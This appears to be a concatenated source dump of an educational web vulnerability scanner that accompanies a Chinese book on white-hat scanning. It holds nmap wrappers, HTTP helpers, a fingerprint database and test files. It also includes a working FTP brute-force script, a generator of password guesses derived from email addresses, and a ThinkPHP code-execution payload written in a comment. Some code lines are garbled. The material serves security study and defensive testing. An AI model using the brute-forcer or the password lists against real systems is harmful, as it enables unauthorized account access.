requests.get('http://www.baidu.com') 26 | print "第二次命中缓存的时间:"+str(r2.elapsed.microseconds) 27 | test() 28 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/multi_nmap_process_background.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | def make_nmproc_obj(targets, options): 7 | return NmapProcess(targets=targets, options=options) 8 | 9 | 
def start_all_bg(nmprocs): 10 | for nmp in nmprocs: nmp.run_background() 11 | 12 | def any_running(nmprocs): 13 | return any([nmp.is_running() for nmp in nmprocs]) 14 | 15 | def summarize(nmprocs): 16 | for nmp in nmprocs: 17 | print("rc: {0} output: {1} stdout len: {2}".format(nmp.rc, nmp.summary, len(nmp.stdout))) 18 | 19 | nm_targets = [] 20 | for h in range(10): 21 | nm_targets.append("localhost") 22 | nm_opts = "-sT" 23 | 24 | nm_procs = [make_nmproc_obj(t, nm_opts) for t in nm_targets] 25 | start_all_bg(nm_procs) 26 | 27 | while any_running(nm_procs): 28 | print("Nmap Scan running...") 29 | sleep(2) 30 | 31 | summarize(nm_procs) 32 | -------------------------------------------------------------------------------- /tests/test_retry_action.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | sys.path.append('/Users/imiyoo/workplace/tscanner') 4 | 5 | import time 6 | import requests 7 | from wCurl import wcurl 8 | from LogManager import log 9 | 10 | def retry_action(retry_num=3): 11 | def decorator(function): 12 | count = {"num":0} 13 | def wrapper(*args,**kwargs): 14 | try: 15 | return function(*args,**kwargs) 16 | except Exception,e: 17 | if count["num"]1: 21 | result.append(temp_list[0]) 22 | del temp_list[0] 23 | 24 | for item in temp_list: 25 | flag = False 26 | for a in result: 27 | if is_similar_url(item,a): 28 | flag = True 29 | if not flag: 30 | result.append(item) 31 | print "去似去含前的数据:" 32 | print url_list 33 | print "去似去含后的数据:" 34 | print result 35 | 36 | 37 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_new_parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | from libnmap.parser import NmapParser, NmapParserException 6 | 7 | baddatalist = ["aaa", None, '', 123, "ports/>>>", "", 8 | "", ""] 9 | 10 | 
11 | class TestNmapParser(unittest.TestCase): 12 | def test_parse(self): 13 | for baddata in baddatalist: 14 | self.assertRaises(NmapParserException, NmapParser.parse, 15 | baddata, "zz") 16 | self.assertRaises(NmapParserException, NmapParser.parse, 17 | baddata, "XML") 18 | self.assertRaises(NmapParserException, NmapParser.parse, 19 | baddata, "YAML") 20 | 21 | if __name__ == '__main__': 22 | test_suite = ['test_parse'] 23 | 24 | suite = unittest.TestSuite(map(TestNmapParser, test_suite)) 25 | test_result = unittest.TextTestRunner(verbosity=2).run(suite) 26 | -------------------------------------------------------------------------------- /teye_web/wavsep/false_xss_url.txt: -------------------------------------------------------------------------------- 1 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case01-DoubleQuotesAndCrLfEncodingInProperty.jsp?userinput=abcd 2 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case02-SingleQuotesAndCrLfEncodingInProperty.jsp?userinput=abcd 3 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case03-DoubleQuotesEqualityAndBracketsEncodingInProperty.jsp?userinput=abcd 4 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case04-SingleQuotesEqualityAndBracketsEncodingInProperty.jsp?userinput=abcd 5 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case05-CrlfRemovalInHttpHeader.jsp?userinput=abcd 6 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case06-QuotesBracketsAndCrLfEncodingInTextProperty.jsp?userinput=abcd 7 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case07-AngleBracketsEncodingInBody.jsp?userinput=abcd 8 | 9 | -------------------------------------------------------------------------------- /tests/test_smart_fill.py: -------------------------------------------------------------------------------- 1 | 
#coding=utf-8 2 | ''' 3 | smart_fill.py 4 | ''' 5 | form_name_kb = { 6 | "cannner":['username','user','userid','nickname','name'], 7 | "bc123456":['password','pass','pwd'], 8 | "est@watscan.com":['email','mail','usermail'], 9 | "13800000000":['mobile'], 10 | "his is just for a test":['content','text','query','search','data','comment'], 11 | "ww.test.com":['domain','website'], 12 | "ttp://www.test.com":['link','url'] 13 | } 14 | def smart_fill( variable_name ): 15 | ''' 16 | ''' 17 | variable_name = variable_name.lower() 18 | flag = False 19 | for filled_value, variable_name_list in form_name_kb.items(): 20 | for variable_name_db in variable_name_list: 21 | if variable_name_db == variable_name: 22 | flag = True 23 | return filled_value 24 | if not flag: 25 | msg = '[smart_fill] Failed to find a value for parameter with name "' 26 | msg += variable_name + '".' 27 | log.debug( msg ) 28 | return 'UNKNOWN' 29 | 30 | if __name__=="__main__": 31 | print smartfill("username") 32 | print smartfill("password") 33 | print smartfill("email") 34 | print smartfill("content") 35 | -------------------------------------------------------------------------------- /teye_port/ext/more_pass.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | more_pass.py 4 | ''' 5 | 6 | import sys 7 | 8 | pass_type_list=[ 9 | '123', 10 | 'abc', 11 | '_123', 12 | '!123', 13 | '@123', 14 | '#123', 15 | '123456', 16 | 'abc123', 17 | '123!@#', 18 | '!@#123', 19 | '123$%^', 20 | '!@#$%^', 21 | '', 22 | '123', 23 | '@123', 24 | '@abc', 25 | '123!@#', 26 | '!@#123', 27 | '123$%^', 28 | '!@#$%^', 29 | '@@123', 30 | '@@123' 31 | ] 32 | 33 | def get_pass_list(email): 34 | ''' 35 | >>>email="zhangsan@baidu.com" 36 | >>>ext_pass_list(email) 37 | >>>['zhangsan@123','zhangsan@baidu@123'...] 
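38 | ''' 39 | item = email.split("@") 40 | name = item[0] 41 | domain = item[1].split(".")[0] 42 | 43 | pass_list = [] 44 | 45 | for line in pass_type_list: 46 | pass_item = line.strip().replace("",name).replace("",domain) 47 | pass_list.append(pass_item) 48 | 49 | return pass_list 50 | 51 | if __name__=="__main__": 52 | result=get_pass_list("zhangsan@baidu.com") 53 | print result 54 | 
--------------------------------------------------------------------------------
/thirdparty/libnmap/reportjson.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import json
from libnmap.objects import NmapHost, NmapService, NmapReport
from libnmap.objects.os import NmapOSFingerprint, NmapOSMatch, NmapOSClass
from libnmap.objects.os import CPE, OSFPPortUsed
from libnmap.parser import NmapParser


class ReportEncoder(json.JSONEncoder):
    """JSON encoder that knows how to serialise the libnmap report objects."""

    def default(self, obj):
        """
        Encode a libnmap object as {"__ClassName__": obj.__dict__}.

        Every instance attribute ends up in the output because the whole
        __dict__ is emitted. Any other type is passed to the base class,
        which raises TypeError for objects it cannot serialise.
        """
        otype = {'NmapHost': NmapHost,
                 'NmapOSFingerprint': NmapOSFingerprint,
                 'NmapOSMatch': NmapOSMatch,
                 'NmapOSClass': NmapOSClass,
                 'CPE': CPE,
                 'OSFPPortUsed': OSFPPortUsed,
                 'NmapService': NmapService,
                 'NmapReport': NmapReport}
        if isinstance(obj, tuple(otype.values())):
            key = ('__{0}__').format(obj.__class__.__name__)
            return {key: obj.__dict__}
        return json.JSONEncoder.default(self, obj)


class ReportDecoder(json.JSONDecoder):
    """JSON decoder that rebuilds a report through NmapParser.parse_fromdict."""

    def decode(self, json_str):
        """Parse json_str with json.loads and hand the result to NmapParser.parse_fromdict."""
        r = NmapParser.parse_fromdict(json.loads(json_str))
        return r

--------------------------------------------------------------------------------
/teye_web/http/cookie.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
cookie.py
'''
import re
import teye_web.http.encode_decode as enc_dec
from teye_web.http.data import data

from encodings import DEFAULT_ENCODING

class cookie(data):
    '''
    This class represents a cookie.
    '''
    def __init__(self, strValues='', encoding=DEFAULT_ENCODING):
        '''
        Parse a "name=value; name2=value2" cookie string.

        :param strValues: cookie string; names and values are stripped of
                          surrounding whitespace before being stored
        :param encoding: forwarded to data.__init__
        '''
        data.__init__(self, encoding=encoding)

        # the appended ';' lets the pattern match the last pair as well
        for k, v in re.findall('(.*?)=(.*?);', strValues + ';' ):
            k = k.strip()
            v = v.strip()

            self[k] = v

    def _sanitize( self, value ):
        '''
        Percent-encode LF and CR in value.

        NOTE(review): presumably this keeps a cookie name or value from
        adding extra header lines once the string is placed in a request
        header; confirm against the caller that builds the request.
        '''
        value = value.replace('\n','%0a')
        value = value.replace('\r','%0d')
        return value

    def __str__( self ):
        '''
        Serialise the cookie as "name=value; name2=value2;".

        __init__ stores every value as a plain string. The previous version
        indexed into that string and emitted one "name=<char>" pair per
        character; a string value is now written once. A list or tuple of
        values still yields one pair per element.
        '''
        parts = []
        for parameter_name in self:
            value = self[parameter_name]
            if isinstance(value, basestring):
                values = [value]
            else:
                values = value
            ks = self._sanitize( parameter_name )
            for item in values:
                parts.append(ks + '=' + self._sanitize( item ) + '; ')
        # drop the trailing space, as the original did
        return ''.join(parts)[:-1]


-------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_nohostname.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |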
10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendplugin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | class NmapBackendPlugin(object): 5 | """ 6 | Abstract class showing to the minimal implementation for a plugin 7 | All subclass MUST at least implement the following methods 8 | """ 9 | def __init__(self): 10 | self.dbname = 'nmapdb' 11 | self.store = 'reports' 12 | 13 | def insert(self, NmapReport): 14 | """ 15 | insert NmapReport in the backend 16 | :param NmapReport: 17 | :return: str the ident of the object in the backend for 18 | future usage 19 | or None 20 | """ 21 | raise NotImplementedError 22 | 23 | def delete(self, id): 24 | """ 25 | delete NmapReport if the backend 26 | :param id: str 27 | """ 28 | raise NotImplementedError 29 | 30 | def get(self, id): 31 | """ 32 | retreive a NmapReport from the backend 33 | :param id: str 34 | :return: NmapReport 35 | """ 36 | raise NotImplementedError 37 | 38 | def getall(self, filter): 39 | """ 40 | :return: collection of tuple (id,NmapReport) 41 | :param filter: Nice to have implement a filter capability 42 | """ 43 | raise NotImplementedError 44 | -------------------------------------------------------------------------------- /tests/test_class_HtmlParser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | 4 | import sys 5 | sys.path.append('/Users/imiyoo/workplace/tscanner') 6 | 7 | from wCurl import wcurl 8 | from teye_web.http.URL import URL 9 | from teye_web.parser.HtmlParser import HtmlParser 10 | 11 | 12 | def test_HtmlParser(): 13 | ''' 14 | ''' 15 | req_url="http://192.168.126.147" 16 | real_contain_urls=['http://www.w3.org/1999/xhtml', 17 | 'http://192.168.126.147/lnmp.gif', 18 | 'http://lnmp.org', 19 | 'http://192.168.126.147/p.php', 20 | 
'http://192.168.126.147/phpinfo.php', 21 | 'http://192.168.126.147/phpmyadmin/', 22 | 'http://lnmp.org', 23 | 'http://bbs.vpser.net/forum-25-1.html', 24 | 'http://www.vpser.net/vps-howto/', 25 | 'http://www.vpser.net/usa-vps/', 26 | 'http://lnmp.org', 27 | 'http://blog.licess.com/', 28 | 'http://www.vpser.net'] 29 | r = wcurl.get(req_url) 30 | 31 | parser = HtmlParser(r) 32 | re_urls,tag_urls = parser.urls 33 | 34 | print "Regex URL:" 35 | for item in re_urls: 36 | print item 37 | 38 | print "Tag URL:" 39 | for item in tag_urls: 40 | print item 41 | 42 | page_urls = [] 43 | page_urls.extend(re_urls) 44 | page_urls.extend(tag_urls) 45 | 46 | true_num = 0 47 | for item in real_contain_urls: 48 | real_url = URL(item) 49 | if real_url in page_urls: 50 | true_num +=1 51 | else: 52 | print real_url 53 | 54 | assert len(real_contain_urls)==true_num 55 | -------------------------------------------------------------------------------- /teye_web/http/postdata.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | postdata.py 4 | ''' 5 | 6 | import encode_decode as enc_dec 7 | from data import data 8 | 9 | from encodings import DEFAULT_ENCODING 10 | 11 | class postdata(data): 12 | ''' 13 | ''' 14 | def __init__(self, init_val=(),encoding=DEFAULT_ENCODING): 15 | ''' 16 | ''' 17 | data.__init__(self, init_val, encoding) 18 | 19 | self._name = None 20 | self._method = None 21 | self._action = None 22 | self._files = None 23 | 24 | 25 | def get_action(self): 26 | ''' 27 | ''' 28 | return self._action 29 | 30 | def get_method(self): 31 | ''' 32 | ''' 33 | return self._method 34 | 35 | def set_method(self,method): 36 | ''' 37 | ''' 38 | self._method = method 39 | 40 | def set_name(self,name): 41 | ''' 42 | ''' 43 | self._name = name 44 | 45 | def set_action(self,action): 46 | ''' 47 | ''' 48 | self._action = action 49 | 50 | def set_file(self,files): 51 | ''' 52 | ''' 53 | self._files= files 54 | 55 | def 
set_data(self,key,value): 56 | ''' 57 | ''' 58 | self[key] = value 59 | 60 | def __str__(self): 61 | ''' 62 | return enc_dec.urlencode(self, encoding=self.encoding) 63 | ''' 64 | return enc_dec.urlencode(self, encoding=self.encoding) 65 | 66 | 67 | if __name__=="__main__": 68 | ''' 69 | ''' 70 | postdata = postdata([('id',1),('test',2)]) 71 | print postdata 72 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 《白帽子讲Web扫描》书籍参考代码说明 2 | 3 | ## 内容介绍 4 | > 由于本书并不是按照代码逻辑来进行编写的,所以建议读者先将项目代码运行起来后,然后再对照书籍来进行学习;代码已作处理,只保留完整的扫描器核心功能,主要以学习和研究为目的,相信认真读完本书后是有能力自己来实现完整云扫描功能;如果您在学习中有遇到问题或不清楚的地方,可以就具体问题进行留言交流和探讨。 5 | 6 | 7 | ## 购买链接:[京东](https://union-click.jd.com/jdc?e=&p=JF8BAOcJK1olXDYCV19VDUkQB19MRANLAjZbERscSkAJHTdNTwcKARlZAUEPVhcJRT9LT0VSBVJESw4PTRNJXGFOSxhBJVMOVF1cAE4VBGs4ciNJVQRbND0_Qxt1Rm0BWy9iKVRHElJROE4XAm4MEl0TXgUyV19eC00RAm4IH2slXQUyAjBdCUoWAm4NG14WbQQDVVtcDEkTBm04G1wXVAYKXVtdDUoQBl8PG1IlBVpaHAADC0oXAl84K1glbTYCZF1tSiVCUWlcElsUW1NRUwxYDxgfCzgLHltAXVNSAQtbWkpFUF8KGloRVDY) 8 | 9 | ## 部署安装 10 | 11 | > git clone https://github.com/imiyoo2010/teye_scanner_for_book.git 12 | 13 | > pip install -r requirements.txt 14 | 15 | > python teye.py 16 | 17 | 成功运行如下: 18 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/1.png) 19 | 20 | ## 使用演示 21 | 22 | 一、扫描具体目标 23 | > python teye.py -s "http://demo.testfire.net/" 24 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/2.png) 25 | 26 | 27 | 二、查看扫描报告 28 | 29 | > 扫描结束后,在teye_report中会自动生成简版的扫描报告供查看扫描结果,演示截图如下: 30 | 31 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/3.png) 32 | 33 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/4.png) 34 | 35 | ## 联系方式 36 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/047a9ee4bb6d81315fb7f4e11c84878639d4255b/qrcode_for_gh_d5852a962ba2_258.jpg) 37 | 
-------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendpluginFactory.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import inspect 4 | 5 | 6 | class BackendPluginFactory(object): 7 | """ 8 | This is a backend plugin factory a backend instance MUST be 9 | created via the static method create() 10 | ie : mybackend = BackendPluginFactory.create() 11 | """ 12 | @classmethod 13 | def create(cls, plugin_name="mongodb", **kwargs): 14 | """Import the needed lib and return an object NmapBackendPlugin 15 | representing the backend of your desire. 16 | NmapBackendPlugin is an abstract class, to know what argument 17 | need to be given, review the code of the subclass you need 18 | :param plugin_name: str : name of the py file without .py 19 | :return: NmapBackend (abstract class on top of all plugin) 20 | """ 21 | backendplugin = None 22 | plugin_path = "libnmap.plugins.{0}".format(plugin_name) 23 | __import__(plugin_path) 24 | pluginobj = sys.modules[plugin_path] 25 | pluginclasses = inspect.getmembers(pluginobj, inspect.isclass) 26 | for classname, classobj in pluginclasses: 27 | if inspect.getmodule(classobj).__name__.find(plugin_path) == 0: 28 | try: 29 | backendplugin = classobj(**kwargs) 30 | except Exception as error: 31 | raise Exception("Cannot create Backend: {0}".format(error)) 32 | return backendplugin 33 | -------------------------------------------------------------------------------- /teye_poc/PocScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | PocScan.py 4 | ''' 5 | 6 | import sys 7 | from teye_web.http.URL import URL 8 | 9 | from teye_data.vuln import vuln 10 | from teye_data.vulnmanager import vm 11 | 12 | class PocScan: 13 | ''' 14 | 15 | ''' 16 | def __init__(self): 17 | ''' 18 | ''' 19 | self._poc_info ={ 20 | 21 | 'w_hat':{ 22 | 'author':None, 
23 | 'blog':None, 24 | 'team':None, 25 | 'create_time':None 26 | }, 27 | 'w_vul':{ 28 | 'id':None, 29 | 'title':None, 30 | 'method':None, 31 | 'tag':None, 32 | 'rank':None, 33 | 'info':None, 34 | } 35 | } 36 | 37 | def check(self,target): 38 | ''' 39 | ''' 40 | pass 41 | 42 | def security_hole(self,url): 43 | ''' 44 | ''' 45 | if isinstance(url,URL): 46 | url = url.url_string 47 | else: 48 | url = url 49 | 50 | name = self._poc_info['w_vul']['title'] 51 | method = self._poc_info['w_vul']['method'] 52 | link_info = self._poc_info['w_vul']['info'] 53 | rank = self._poc_info['w_vul']['rank'] 54 | 55 | v = vuln() 56 | v.set_url(url) 57 | v.set_name(name) 58 | v.set_rank(rank) 59 | v.set_method(method) 60 | v.set_link_info(link_info) 61 | 62 | site = URL(v.get_url()).get_host() 63 | 64 | vm.append(self,site,v.get_name(),v) 65 | 66 | def get_title(self): 67 | return self._poc_info['w_vul']['title'] 68 | 69 | def get_name(self): 70 | ''' 71 | ''' 72 | return "teye_poc_plugin" 73 | 74 | 75 | if __name__=="__main__": 76 | ps = PocScan() 77 | ps.security_hole("http://wwww.baidu.com") 78 | print vm.get_all_vuln() 79 | -------------------------------------------------------------------------------- /env_config.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | env_config.py 4 | 配置扫描所需要的环境 5 | ''' 6 | import os 7 | import platform 8 | import teye_config as Settings 9 | 10 | os_info = platform.platform() # 获取操作系统名称及版本号,'Windows-7-6.1.7601-SP1' 11 | sys_info = platform.system() # Linux or windows or darwin 12 | ''' 13 | def nmap_search_path(): 14 | pass 15 | 16 | syslist = { 17 | "win": ["windows"], 18 | "linux": ['ubuntu', 'centos', 'debian'], 19 | "mac": ["darwin"] 20 | } 21 | 22 | if os_info.lower() in syslist.get("mac"): # Mac 23 | # Install brew 24 | cmd = 'ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2 > /dev/null' 25 | os.system(cmd) 26 | # Install Nmap 
27 | cmd = "brew install nmap" 28 | os.system(cmd) 29 | # Install python-nmap 30 | cmd = "pip install python-nmap" 31 | os.system(cmd) 32 | 33 | if os_info.lower() in syslist.get("linux"): # Linux 34 | # python-dev,python-pip 35 | os.system("apt-get -y install python-dev") 36 | os.system("apt-get install python-pip") 37 | # lxml 38 | os.system("apt-get -y install libxml2 libxml2-dev") 39 | os.system("apt-get -y install python-libxml2") 40 | os.system("apt-get -y install python-lxml") 41 | 42 | # nmap 43 | os.system("apt-get -y install nmap") 44 | 45 | # python-paramiko 46 | os.system("apt-get -y install python-paramiko") 47 | 48 | if os_info.lower() in syslist.get("win"): # windows 49 | pass 50 | ''' 51 | # pip install -r requirements.txt 52 | piprequire = Settings.ROOT_PATH + "/requirements.txt" 53 | os.system("pip install -r " + piprequire) 54 | -------------------------------------------------------------------------------- /teye_data/vuln.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | vuln.py 4 | ''' 5 | 6 | import uuid 7 | import json 8 | 9 | class vuln(dict): 10 | ''' 11 | ''' 12 | def __init__( self ): 13 | #设置默认值 14 | self["url"] = None 15 | self["method"] = None 16 | self["param"] = None 17 | self["name"] = None 18 | self["title"] = None 19 | self["rank"] = None 20 | self["desc"] = None 21 | self["link_info"] = None 22 | 23 | 24 | def set_url(self,url): 25 | ''' 26 | ''' 27 | self["url"] = url 28 | 29 | def set_method(self,method): 30 | ''' 31 | ''' 32 | self["method"] = method 33 | 34 | def set_param(self,param): 35 | ''' 36 | ''' 37 | self["param"] = param 38 | 39 | def set_name(self,name): 40 | ''' 41 | ''' 42 | self["name"] = name 43 | 44 | def set_rank(self,rank): 45 | ''' 46 | ''' 47 | self["rank"] = rank 48 | 49 | def set_link_info(self,link_info): 50 | ''' 51 | ''' 52 | self["link_info"] = link_info 53 | 54 | def get_url(self): 55 | ''' 56 | ''' 57 | return self["url"] 58 | 59 | 
def get_name(self): 60 | ''' 61 | ''' 62 | return self["name"] 63 | 64 | def get_rank(self): 65 | ''' 66 | ''' 67 | return self["rank"] 68 | 69 | def get_method(self): 70 | ''' 71 | ''' 72 | return self["method"] 73 | 74 | def get_param(self): 75 | ''' 76 | ''' 77 | return self["param"] 78 | 79 | def __str__(self): 80 | ''' 81 | ''' 82 | return json.dumps(self) 83 | 84 | def __repr__(self): 85 | ''' 86 | ''' 87 | if isinstance(self["name"],unicode): 88 | name = self["name"].encode("utf-8") 89 | elif isinstance(self["name"],basestring): 90 | name = self["name"] 91 | 92 | return '' 93 | -------------------------------------------------------------------------------- /teye_web/util/smart_fill.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | smart_fill.py 4 | ''' 5 | import sys 6 | sys.path.append("/Users/imiyoo/workplace/tscanner/") 7 | 8 | from LogManager import log 9 | 10 | parameter_name_knowledge = { 11 | 'tscanner': ['username','user','uname','userid','nickname', 'logname','name','lastname','firstname'], 12 | 13 | 'abc123456': ['pass','word','pswd','pwd','auth','password'], 14 | 15 | 'test@watscan.com':['mail','email','e-mail'], 16 | 17 | 'www.test.com':['domain'], 18 | 19 | 'http://www.test.com/':['link','target', 'url', 'website', 'website'], 20 | 21 | 'Just For A Test!':['content','text', 'words', 'query', 'search', 'keyword', 'title', 'desc', 'data', 22 | 'payload', 'answer', 'description', 'descripcion', 23 | 'message', 'excerpt', 'comment'], 24 | 25 | 'www.watscan.com':['domain'] 26 | 27 | } 28 | 29 | def smart_fill( variable_name ): 30 | ''' 31 | ''' 32 | variable_name = variable_name.lower() 33 | 34 | flag = False 35 | 36 | for filled_value, variable_name_list in parameter_name_knowledge.items(): 37 | 38 | for variable_name_db in variable_name_list: 39 | 40 | if variable_name_db == variable_name: 41 | 42 | flag = True 43 | 44 | return filled_value 45 | 46 | if not flag: 47 | 48 | msg = 
'[smart_fill] Failed to find a value for parameter with name "' + variable_name + '".' 49 | log.debug( msg ) 50 | 51 | return 'UNKNOWN' 52 | 53 | if __name__=="__main__": 54 | print "usrname=%s" % smart_fill("username") 55 | print "password=%s" % smart_fill("password") 56 | print "domain=%s" % smart_fill("domain") 57 | print "email=%s" % smart_fill("email") 58 | print "content=%s" % smart_fill("content") 59 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/proc_nmap_like.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from libnmap.process import NmapProcess 3 | from libnmap.parser import NmapParser, NmapParserException 4 | 5 | 6 | # start a new nmap scan on localhost with some specific options 7 | def do_scan(targets, options): 8 | nm = NmapProcess(targets, options) 9 | rc = nm.run() 10 | if rc != 0: 11 | print("nmap scan failed: {0}".format(nm.stderr)) 12 | 13 | try: 14 | parsed = NmapParser.parse(nm.stdout) 15 | except NmapParserException as e: 16 | print("Exception raised while parsing scan: {0}".format(e.msg)) 17 | 18 | return parsed 19 | 20 | 21 | # print scan results from a nmap report 22 | def print_scan(nmap_report): 23 | print("Starting Nmap {0} ( http://nmap.org ) at {1}".format( 24 | nmap_report._nmaprun['version'], 25 | nmap_report._nmaprun['startstr'])) 26 | 27 | for host in nmap_report.hosts: 28 | if len(host.hostnames): 29 | tmp_host = host.hostnames.pop() 30 | else: 31 | tmp_host = host.address 32 | 33 | print("Nmap scan report for {0} ({1})".format( 34 | tmp_host, 35 | host.address)) 36 | print("Host is {0}.".format(host.status)) 37 | print(" PORT STATE SERVICE") 38 | 39 | for serv in host.services: 40 | pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format( 41 | str(serv.port), 42 | serv.protocol, 43 | serv.state, 44 | serv.service) 45 | if len(serv.banner): 46 | pserv += " ({0})".format(serv.banner) 47 | 
print(pserv) 48 | print(nmap_report.summary) 49 | 50 | 51 | if __name__ == "__main__": 52 | report = do_scan("127.0.0.1", "-sV") 53 | print_scan(report) 54 | -------------------------------------------------------------------------------- /teye_port/brute_ftp.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import sys 3 | import ftplib 4 | 5 | BRUTE_BREAK = True 6 | 7 | def Login(ServerIP, username, password): 8 | ''' 9 | ''' 10 | f = ftplib.FTP() 11 | f.connect(ServerIP, 21, timeout=10) 12 | print "Login FTP..." 13 | try: 14 | f.login(username, password) 15 | except ftplib.all_errors: 16 | print "Error:Server %s Cannot Login by the Account(%s,%s)" % (ServerIP, username, password) 17 | f.quit() 18 | return False 19 | 20 | return True 21 | 22 | 23 | def Brute(ServerIP, userlist, passlist, Port=21): 24 | ''' 25 | ''' 26 | user_handler = open(userlist) 27 | pass_handler = open(passlist) 28 | try: 29 | user_line = user_handler.readlines() 30 | pass_line = pass_handler.readlines() 31 | finally: 32 | user_handler.close() 33 | pass_handler.close() 34 | 35 | for user in user_line: 36 | ftpuser = user.strip() 37 | for pwd in pass_line: 38 | ftppass = pwd.strip() 39 | print "testing account:(%s,%s)" % (ftpuser, ftppass) 40 | success = False 41 | try: 42 | success = Login(ServerIP, ftpuser, ftppass) 43 | except: 44 | continue 45 | if success: 46 | print "%s:%d-->(%s,%s) Success" % (ServerIP, Port, ftpuser, ftppass) 47 | if BRUTE_BREAK: 48 | sys.exit(-1) 49 | 50 | print "---------------Brute End-----------------" 51 | # print user_line 52 | # print pass_line 53 | 54 | 55 | if __name__ == "__main__": 56 | # sucess=LoginFtp('x.x.x.x','admin','admin') 57 | 58 | # if sucess: 59 | # print "Login Success!" 60 | # else: 61 | # print "Login Failed!" 
62 | Brute("192.168.126.145", "username.lst", "password.lst") 63 | -------------------------------------------------------------------------------- /teye_file/finger/app.db: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #teye_finger 3 | #json 4 | #应用指纹库 5 | #特殊符号:",\,需要进行转义处理 6 | #\\用来表示\ 7 | #网络组件,服务组件,主机组件,建站组件,其它组件,按分层思想来划分 8 | {"nginx":{"url":"/","headers":["server","nginx"]}} 9 | {"lnmp":{"id":1,"url":"/p.php","body":"PHP探针\\s*for\\s*LNMP一键安装包","type":"other"}} 10 | {"jboss":{"url":"/","headers":["X-Powered-By","JBoss"]}} 11 | {"360wzb":{"url":"/","headers":["X-Powered-By-360WZB","360"]}} 12 | {"yunjiasu":{"url":"/","headers":["server","yunjiasu-nginx"]}} 13 | {"anquanbao":{"url":"/","headers":["server","aserver"]}} 14 | {"struts":{"url":"/struts/webconsole.html","body":"Welcome\\s*to\\s*the\\s*OGNL\\s*console\\!"}} 15 | {"dedecms5.6":{"url":"/templets/default/style/dedecms.css","body":"dedecms\\s*v5\\.6\\s*style"}} 16 | {"wordpress":{"url":"/wp-admin","body":"name=\"wp-submit\""}} 17 | {"discuz":{"url":"/","body":"content=\\\"Discuz"}} 18 | {"discuz7.2":{"url":"/forumdata/cache/common.js","body":"var\\sdiscuz_uid"}} 19 | {"anquangou":{"url":"/","headers":["X-Powered-By","WAF/2\\.0"]}} 20 | {"phpwind":{"url":"/res/css/admin_layout.css","body":"phpwind\\.com"}} 21 | {"Joomla":{"url":"/administrator/components/com_login/login.xml","body":"Joomla\\!"}} 22 | {"phpcmsv9":{"url":"/phpcms/templates/default/special/index.html","body":"\\{pc:special\\s*action="}} 23 | {"cmseasy":{"url":"/celive/js/system.js","body":"www\\.cmseasy\\.cn"}} 24 | {"live800":{"url":"/live800/chatClient/sendFile.htm","body":"UploadFile"}} 25 | #代码执行漏洞module/aciton/param1/$%7B@phpinfo()%7D 26 | {"thinkphp":{"url":"/?c=4e5e5d7364f443e28fbf0d3ae744a59a","headers":["Content-Type","image/png"]}} 27 | #phpmyadmin 28 | {"phpmyadmin":{"url":"/phpmyadmin","body":"phpMyAdmin\\s*"}} 29 | {"Spring 
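MVC":{"url":"/spring_security_login","body":"j_spring_security_check"}}
30 | {"贷齐乐金融系统":{"url":"/themes/default/images/bg.png","md5":"241a8a919e8dbd0017148eee96ecd5cf"}}
31 |
--------------------------------------------------------------------------------
/taskSchedule.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
Task dispatcher: polls the task database for new scan tasks and hands their
messages to the Celery task DoScanTask in batches.

Run it in the background with:
nohup python taskSchedule.py &
'''
import os
import sys
import time
import json
import datetime
import teye_config as Settings

from LogManager import log
from Queue import Queue
from teye_worker.RDB import RDB
from teye_worker.scan import DoScanTask

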